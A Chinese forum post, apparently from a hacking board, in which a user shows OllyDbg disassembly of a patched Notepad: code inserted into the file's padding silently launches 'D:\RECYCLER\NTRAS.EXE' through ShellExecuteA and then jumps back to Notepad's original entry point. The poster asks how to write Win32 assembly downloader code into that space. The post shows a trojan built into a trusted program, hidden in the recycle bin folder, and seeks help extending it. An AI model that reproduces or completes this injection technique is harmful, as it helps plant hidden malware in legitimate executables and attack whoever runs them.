怀化游子

引用:
引用第3楼asm于2007-07-22 00:39发表的 :
插记事本不是很简单吗?

代码测试环境:

  windows XP SP2
.......
恐怕ASM没懂我的意图。


01008747   00     db 00
01008748  . 44 3A 5C 5>ascii "D:\\RECYCLER\NTR"
01008758  . 41 53 2E 4>ascii "AS.EXE",0
0100875F  . 6F 70 65 6>ascii "open",0
01008764   00     db 00
01008765  > 60     pushad
01008766  . 6A 00   push 0                  ; /IsShown = 0
01008768  . 6A 00   push 0                  ; |DefDir = NULL
0100876A  . 6A 00   push 0                  ; |Parameters = NULL
0100876C  . 68 4887000>push NOTEPAD(.01008748          ; |FileName = "D:\\RECYCLER\NTRAS.EXE"
01008771  . 68 5F87000>push NOTEPAD(.0100875F          ; |Operation = "open"
01008776  . 6A 00   push 0                  ; |hWnd = NULL
01008778  . E8 4387607>call SHELL32.ShellExecuteA        ; \ShellExecuteA
0100877D  . 61     popad
0100877E  . 6A 70   push 70
01008780  . 68 9818000>push NOTEPAD(.01001898
01008785  .^ E9 19ECFFF>jmp NOTEPAD(.010073A3
0100878A   00     db 00
0100878B   00     db 00
0100878C   00     db 00
0100878D   00     db 00
0100878E   00     db 00
0100878F   00     db 00
01008790   00     db 00
01008791   00     db 00
01008792   00     db 00
01008793   00     db 00
01008794   00     db 00
01008795   00     db 00
01008796   00     db 00
01008797   00     db 00
01008798   00     db 00
01008799   00     db 00
0100879A   00     db 00



如上代码所示。我想在在OD中，对记事本末尾的空白空间处加入下载者的代码。
要在OllyDbg里写入WIN32汇编的下载者功能代码！！！我不知道该如何写？？

帖子67 精华0 积分3214 阅读权限100 性别男 在线时间104 小时 注册时间2007-1-29 最后登录2008-7-5 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

黑菜
荣誉会员